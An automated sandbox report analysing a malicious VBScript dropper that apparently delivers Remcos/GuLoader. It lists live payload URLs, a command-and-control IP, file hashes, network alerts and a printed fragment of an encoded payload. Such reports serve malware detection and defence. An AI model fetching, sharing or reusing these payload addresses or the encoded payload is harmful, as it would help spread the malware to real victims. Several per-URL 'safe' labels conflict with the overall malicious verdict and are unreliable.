              https://ig2c.icu/JvCarekj/NywxkpRVdifOOuG4.bin0%Avira URL Cloudsafe
              https://ig2c.icu0%Avira URL Cloudsafe
              https://ig2c.icu/ZtySvRyz/Blusterer.deploy0%Avira URL Cloudsafe
              https://ig2c.icu/0%Avira URL Cloudsafe
              http://crl.microsoftz0%Avira URL Cloudsafe
              https://ig2c.icu/ZtySvRyz/Blusterer.deployP0%Avira URL Cloudsafe
              https://ig2c.icu/ZtySvRyz/Blusterer.deployXRml0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ig2c.icu
              		172.67.210.11
              		truefalse
                		unknown
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://ig2c.icu/JvCarekj/NywxkpRVdifOOuG4.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ig2c.icu/ZtySvRyz/Blusterer.deployfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://ig2c.icupowershell.exe, 00000002.00000002.1504759097.000002485A4EB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://ig2c.icupowershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1504759097.000002485A494000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.microsoftpowershell.exe, 00000002.00000002.1503719868.0000024856CD5000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000002.00000002.1504759097.0000024859440000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://ig2c.icu/msiexec.exe, 00000007.00000002.2649817843.0000000006C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://ig2c.icu/ZtySvRyz/Blusterer.deployXRmlpowershell.exe, 00000005.00000002.1714950022.0000000004A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.microsoftzpowershell.exe, 00000005.00000002.1741174353.0000000007202000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ig2c.icu/ZtySvRyz/Blusterer.deployPpowershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1504759097.0000024858861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1714950022.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1504759097.0000024858A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            154.216.18.216
                                            		unknownSeychelles
                                            		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                            172.67.210.11
                                            		ig2c.icuUnited States
                                            		13335CLOUDFLARENETUSfalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1576526
                                            Start date and time:2024-12-17 08:28:33 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 41s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Sublabially.vbs
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winVBS@8/7@1/2
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 92%
                                            • Number of executed functions: 67
                                            • Number of non-executed functions: 4
                                            Cookbook Comments:
                                            • Found application associated with file extension: .vbs

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 7536 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7824 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            02:29:26API Interceptor82x Sleep call for process: powershell.exe modified
                                            02:30:55API Interceptor284976x Sleep call for process: msiexec.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            154.216.18.216Strait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              DT RDU KDFT0089.exeGet hashmaliciousRemcosBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s-part-0035.t-0009.t-msedge.net#U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                • 13.107.246.63
                                                https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637Get hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                Quas_Brout_ncrypt.exeGet hashmaliciousQuasarBrowse
                                                • 13.107.246.63
                                                Client-built.exeGet hashmaliciousQuasarBrowse
                                                • 13.107.246.63
                                                wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                • 13.107.246.63
                                                bad.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.246.63
                                                Yogi Tea Benefits Open Enrollment.emlGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.246.63
                                                http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUSBrokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                • 104.21.2.70
                                                DHL.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.48.233
                                                SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                • 104.21.87.65
                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.56.70
                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.56.70
                                                fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                • 104.21.87.65
                                                1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                • 104.18.0.75
                                                Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                • 104.21.83.229
                                                https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637Get hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • 104.21.84.67
                                                SKHT-ASShenzhenKatherineHengTechnologyInformationCoZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                • 154.216.20.243
                                                RUN.VBS.vbsGet hashmaliciousUnknownBrowse
                                                • 154.216.18.89
                                                arm4.elfGet hashmaliciousMiraiBrowse
                                                • 156.230.19.168
                                                h.htmlGet hashmaliciousUnknownBrowse
                                                • 154.216.18.69
                                                invoice.htmlGet hashmaliciousUnknownBrowse
                                                • 154.216.18.89
                                                Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 154.216.17.190
                                                1734335488857ad04f18b89ed443298ec4ba194986b75012687d1a4e65fb772a035ff002b3927.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                • 154.216.17.204
                                                17343353665dbf331bb34348160d07a40652276a18d932b7a75cefa9161a74f0bd5e08d97f649.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 154.216.17.204
                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                • 154.216.20.243
                                                arm6.elfGet hashmaliciousUnknownBrowse
                                                • 154.211.34.28

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eBrokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                • 172.67.210.11
                                                Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.210.11
                                                Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.210.11
                                                SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                • 172.67.210.11
                                                Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.210.11
                                                fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                • 172.67.210.11
                                                seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • 172.67.210.11
                                                sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • 172.67.210.11
                                                createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                • 172.67.210.11
                                                PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 172.67.210.11
                                                37f463bf4616ecd445d4a1937da06e1969633f.msiGet hashmaliciousVidarBrowse
                                                • 172.67.210.11
                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.210.11
                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.210.11
                                                fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                • 172.67.210.11
                                                1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.210.11
                                                Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                • 172.67.210.11
                                                PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 172.67.210.11
                                                file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                • 172.67.210.11
                                                Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                • 172.67.210.11
                                                ME-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.67.210.11

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):11608
                                                Entropy (8bit):4.8908305915084105
                                                Encrypted:false
                                                SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:@...e................................................@..........

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51du2srt.z2x.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d234i1w2.fk3.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guhjfzzv.rfp.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hk2jbcxd.5vs.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Roaming\misinforms.Non

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):456836
                                                Entropy (8bit):5.951290971765033
                                                Encrypted:false
                                                SSDEEP:6144:UMKTpE6KHIBEndNyd0otjif1knn2D3RbOhwBQhR4O9TRVRgz9Bx1rsYm0L/8TWW:UMKNJecEndNydSY6B6hwuhdxKLGw9W
                                                MD5:1760AB55A280B98972A4B447F81D684F
                                                SHA1:B34D4CC6C0AE3400166786B3021DBAC19DB9A0E0
                                                SHA-256:EEE690FD285D62217727506E3099BCDF98E048C521A24375F912DAD3B4700F0B
                                                SHA-512:2B62055C145F874276272090296831F79DEB1361F92F24864A8B01CCB41AEBC056DD071D7E1C0F5862DF4CEFEFF5731105AB4DCAAE9D4CEF8E2E8C6599376F37
                                                Malicious:false
                                                Preview:6wLbgnEBm7to+xkAcQGbcQGbA1wkBOsC3gzrAo8iuU7nRVhxAZtxAZuB8QyQNvvrAvCt6wLHrIHxQndzo3EBm+sCBUBxAZvrAhENuvDd2t1xAZtxAZvrAg8/6wLhsDHKcQGb6wK5i4kUC+sCZhtxAZvR4nEBm+sCH56DwQTrAmO8cQGbgflYN1QCfMpxAZtxAZuLRCQEcQGbcQGbicPrAgENcQGbgcPLsjIBcQGb6wIrsLqJsai8cQGb6wIJhoHyuUgdgXEBm3EBm4HqMPm1PesC6AZxAZtxAZtxAZtxAZtxAZuLDBDrAm2Z6wJtiYkME3EBm3EBm0JxAZtxAZuB+jzFBAB11+sCL/frArA1iVwkDHEBm3EBm4HtAAMAAOsCxMDrAsuFi1QkCHEBm+sCrx6LfCQEcQGb6wIQv4nrcQGb6wIa+4HDnAAAAOsC8YxxAZtT6wLZwusC21pqQHEBm3EBm4nrcQGbcQGbx4MAAQAAAEBxAusC8XjrAgXtgcMAAQAA6wKVg3EBm1NxAZvrAo+4ievrApgxcQGbibsEAQAA6wK0NnEBm4HDBAEAAHEBm3EBm1NxAZtxAZtq/3EBm3EBm4PCBXEBm3EBmzH26wJAjusCDyMxyesCiTdxAZuLGnEBm+sC82VBcQGbcQGbORwKdfRxAZtxAZtG6wIAfOsC0ISAfAr7uHXecQGbcQGbi0QK/HEBm3EBmynwcQGbcQGb/9LrAtVCcQGbujzFBADrArshcQGbMcDrAqAqcQGbi3wkDOsC0UJxAZuBNAeeHJelcQGb6wIOA4PABHEBm+sCe1E50HXkcQGb6wKP6In7cQGbcQGb/9frAsM56wIKLafEf6eeHJecVpho/qbFxx3OZLaho/eXpZ4TE+MsGJf9F/ke2C+jnHgK/RZSNjbz4x/rE/NVURZKuYKsT7fgHNgvSfGcR5VyHKguXvEf9cuafUUWTE5ETlkf9WU8kuJQ4ZMcoLsrWRbhkxywCbvd

                                                Static File Info

                                                General

                                                File type:ASCII text, with very long lines (354), with CRLF line terminators
                                                Entropy (8bit):5.0242713348497965
                                                TrID:
                                                  File name:Sublabially.vbs
                                                  File size:47'800 bytes
                                                  MD5:c4189a98b8eda94cb6632e57fe824155
                                                  SHA1:0455b4277f9ad2e1ed9d6349c9459a843ddf5dff
                                                  SHA256:9ab13f3f467c2ee1421b70d642789f7ee63bdf94841bd612e5ffa44c041a9a45
                                                  SHA512:510ee5434ce30929c435fbfbc113d7d6549a08961ffe3e52f0dd354cc5f76fd38bf741260b5fef15582f892cad891da56fe9db114a71a326bd5f665faa298d55
                                                  SSDEEP:768:DUjonk+CRK4ItAdI5ll04OLUjK+64dfChihLRJI8Z9z2Ano9uKFgS:Deok/VdI5l6RLUiCDLqA7AJ
                                                  TLSH:D9232A67EF24066B8DCE2659FD645F86C97CC401412739F5BEED038E904A89CE3BE219
                                                  File Content Preview:..'hyphenation! attraperedes; phellum,..'Koghedt goombah. turntail, teoretisafr...'Oversupplied swayers pelsjgernes nonmoderateness;..'Trkkanals listigstes, lymphosarcomas: headachier?..'Nave, egrets?....'Hyggespreders, respelled..'Unexcitableness! supers

                                                  File Icon

                                                  Icon Hash:68d69b8f86ab9a86

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-17T08:29:21.022618+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949973154.216.18.2162404TCP
                                                  2024-12-17T08:30:17.833317+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949815172.67.210.11443TCP
                                                  2024-12-17T08:30:42.265024+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949826154.216.18.2162404TCP
                                                  2024-12-17T08:31:05.313531+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949877154.216.18.2162404TCP
                                                  2024-12-17T08:31:28.343680+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949925154.216.18.2162404TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 17, 2024 08:29:28.717271090 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:28.717328072 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:28.717416048 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:28.724489927 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:28.724508047 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:29.947493076 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:29.947566032 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:29.962992907 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:29.963006020 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:29.963507891 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:29.997193098 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:30.039344072 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.157517910 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.210304022 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.381779909 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.381834984 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.381886005 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.381916046 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.428894043 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.492367029 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.498017073 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.498087883 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.498116970 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.506335974 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.506439924 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.506452084 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.553859949 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.602715969 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.606556892 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.606656075 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.606683016 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.608247995 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.608320951 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.608329058 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.616651058 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.616733074 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.616743088 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.624993086 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.625072956 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.625087976 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.641745090 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.641782045 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.641813040 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.641841888 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.641855955 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:31.641865969 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:31.694550037 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.051544905 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.055454969 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.055562973 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.055593967 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.100893974 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.162556887 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.165086031 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.165134907 CET49717443192.168.2.9172.67.210.11
